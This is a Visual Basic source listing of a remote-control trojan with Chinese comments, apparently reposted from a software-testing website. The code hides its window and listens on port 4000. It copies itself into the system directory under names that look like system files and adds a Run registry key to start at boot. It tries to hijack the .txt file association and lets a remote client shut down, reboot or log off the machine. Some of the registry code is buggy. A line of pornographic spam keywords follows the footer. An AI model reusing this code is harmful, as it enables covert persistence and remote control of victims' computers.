'主窗體:Frm_Winsock
'Winsock控件:G_Server
Private Sub Form_Load()
'隱藏進程
'
'讀取主機IP
HostIP = G_Server.LocalIP
'讀取主機名
HostName = G_Server.LocalHostName
With Me
'設置本地默認端口
.G_Server.LocalPort = 4000
'監聽
.G_Server.Listen
'隱藏窗體
.Hide
End With
'獲取木馬所在目錄
Dim sCurrentPath As String
sCurrentPath = App.Path & "\" & App.EXEName & ".exe"
Debug.Print sCurrentPath
Dim sSystemDir As String
sSystemDir = "C:\winnt\system32"
On Error Resume Next
'復制文件成系統目錄下的Systrsy.exe
FileCopy sCurrentPath, sSystemDir & "\Systrsy.exe"
On Error Resume Next
'復制文件成系統目錄下的txtView.exe
FileCopy sCurrentPath, sSystemDir & "\txtView.exe"
'調用
Call StartupGroup
Call WriteToTxt
'判斷程序是否下在運行
If App.PrevInstance Then
'如果已經運行就退出。
End
End If
End Sub
Private Sub G_Server_ConnectionRequest(ByVal requestID As Long)
With Me
If .G_Server.State <> sckClosed Then G_Server.Close
.G_Server.Accept requestID
End With
End Sub
Private Sub G_Server_DataArrival(ByVal bytesTotal As Long)
Dim strData As String
With Me
' 接收客戶請求的信息
.G_Server.GetData strData
Select Case strData
Case "Exit"
'關機
Call ExitWindowsEx(EWX_SHUTDOWN, 0)
Case "Reboot"
'重啟
Call ExitWindowsEx(EWX_REBOOT, 0)
Case "Logoff"
'注銷
Call ExitWindowsEx(EWX_LOGOFF, 0)
End Select
End With
End Sub
'modApi模塊
'聲明全局變量
Public HostIP As Variant
Public HostName As Variant
'聲明API函數
Public Declare Function ExitWindowsEx Lib "user32" (ByVal uFlags As Long, _
ByVal dwReserved As Long) _
As Long
Public Const EWX_LOGOFF = 0
Public Const EWX_REBOOT = 2
Public Const EWX_SHUTDOWN = 1
Public Declare Function ClipCursor Lib "user32" (lpRect As Any) As Long
Public Type RECT
Left As Long
Top As Long
Right As Long
Bottom As Long
End Type
Public Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long, _
ByVal lpSubKey As String, _
phkResult As Long) _
As Long
Public Declare Function RegSetvalueEx Lib "advapi32.dll" Alias "RegSetvalueExA" (ByVal hKey As Long, _
ByVal lpvalueName As String, _
ByVal Reserved As Long, _
ByVal dwType As Long, _
lpData As Any, _
ByVal cbData As Long) _
As Long
Public Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, _
ByVal lpSubKey As String, _
phkResult As Long) _
As Long
Public Const REG_BINARY = 3
Public Const REG_SZ = 1
Public Const HKEY_LOCAL_MACHINE = &H80000002
Public Const HKEY_CLASSES_ROOT = &H80000000
Declare Sub keybd_event Lib "user32" (ByVal bVk As Byte, _
ByVal bScan As Byte, _
ByVal dwFlags As Long, _
ByVal dwExtraInfo As Long)
'寫到注冊表啟動組中的過程
Public Sub StartupGroup()
Dim skey As String
Dim result As Long
Dim hKeyID As Long
Dim skeyVal As String
'啟動組中的鍵,找一個與系統文件相近的。
skey = "Systrsy"
'木馬文件的路徑,可以用GetSystemDirectory來取得系統路徑。
skeyVal = "C:\winnt\system32\systrsy.exe"
result = RegOpenKey(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Run", hKeyID)
If result = 0 Then
Debug.Print hKeyID & "/n"
result = RegSetvalueEx(hKeyID, skey, 0&, REG_SZ, skeyVal, Len(skey) + 1)
Debug.Print result & "/n"
End If
End Sub
'與txt文件進行關聯
Public Sub WriteToTxt()
Dim result As Long
Dim hKeyID As Long
Dim skey As String
Dim skeyVal As String
skey = "txtfile\shell\open\command"
skeyVal = "C:\windows\system\txtView.exe"
result = RegOpenKey(HKEY_CLASSES_ROOT, skeyVal, hKeyID)
If result = 0 Then
Debug.Print hKeyID & "/n"
result = RegSetvalueEx(hKeyID, skey, 0&, REG_SZ, skeyVal, Len(skeyVal) + 1)
Debug.Print result
End If
End Sub
文章來源于領測軟件測試網 http://www.kjueaiud.com/
版權所有(C) 2003-2010 TestAge(領測軟件測試網)|領測國際科技(北京)有限公司|軟件測試工程師培訓網 All Rights Reserved
北京市海淀區中關村南大街9號北京理工科技大廈1402室 京ICP備10010545號-5
技術支持和業務聯系:info@testage.com.cn 電話:010-51297073
老湿亚洲永久精品ww47香蕉图片_日韩欧美中文字幕北美法律_国产AV永久无码天堂影院_久久婷婷综合色丁香五月